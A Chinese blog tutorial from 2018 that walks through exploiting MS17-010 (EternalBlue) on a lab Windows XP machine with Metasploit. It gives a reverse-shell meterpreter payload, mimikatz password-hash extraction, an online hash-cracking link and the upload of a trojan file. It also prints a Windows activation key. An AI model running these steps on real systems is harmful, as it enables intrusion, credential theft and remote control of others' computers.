日期:2018-07-21 21:09:16
介绍:永恒之蓝利用的 ms17-010 漏洞,拿 Shell、查看文件、获取密码。


攻击机

  1. 系统:macOS Sierra 10.12.5
  2. IP10.211.55.2

靶机

  1. 系统:Windows XP SP3 英文版(虚拟机)
  2. IP10.211.55.19
  3. 激活码:HTXH6-2JJC4-CDB6C-X38B4-C3GF3

mac 中使用 metasploitkali 中使用 metasploit 去做攻击,流程是一样的,按照以下步骤进行即可。

首先在命令行输入 msfconsole 进入 metasploit

进入后,使用 search 命令,查找与 ms17-010 相关的模块。

依次进行以下操作。

  1. # 选择 msf 相关的模块
  2. use exploit/windows/smb/ms17_010_psexec
  3. # 查看需要设置的信息
  4. show options
  5. # 设置靶机的 IP 和端口
  6. set rhosts 10.211.55.19
  7. set rport 445
  8. # 设置攻击使用的 payload
  9. set payload windows/meterpreter/reverse_tcp
  10. set lhost 10.211.55.2
  11. set lport 4444
  12. # 进行攻击
  13. exploit

成功弹回 shell。

查看靶机文件,可直接在 shell 中执行 cmd 命令。

也可以直接在 meterpreter 中操作。

提取 Windows 密码的 hash:

  1. 密码哈希有三种方式:LMNTLMNTLMv2LM 存储的时候,7个字符一组(如果密码长度是14位,就会分成两组),NTLM 是整体转换。
  2. 使用工具 mimikatz,获取到 ntlm 的值,
  3. 然后去 http://www.objectif-securite.ch/en/ophcrack.php 解密即可。

相关命令:

  1. getsystem
  2. load mimikatz
  3. msv

  1. shell
  2. echo rundll32.exe user32.dll LockWorkStation > 1.bat
  3. 1.bat
  1. upload /tmp/muma.exe c:\\

利用 meterpreter 还可以进行监听键盘、获取图形化界面等操作,
此处不一一演示,有兴趣可上网查询相关资料。

版权声明:本文为v1vvwv原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://www.cnblogs.com/v1vvwv/p/ms17-010-exploit.html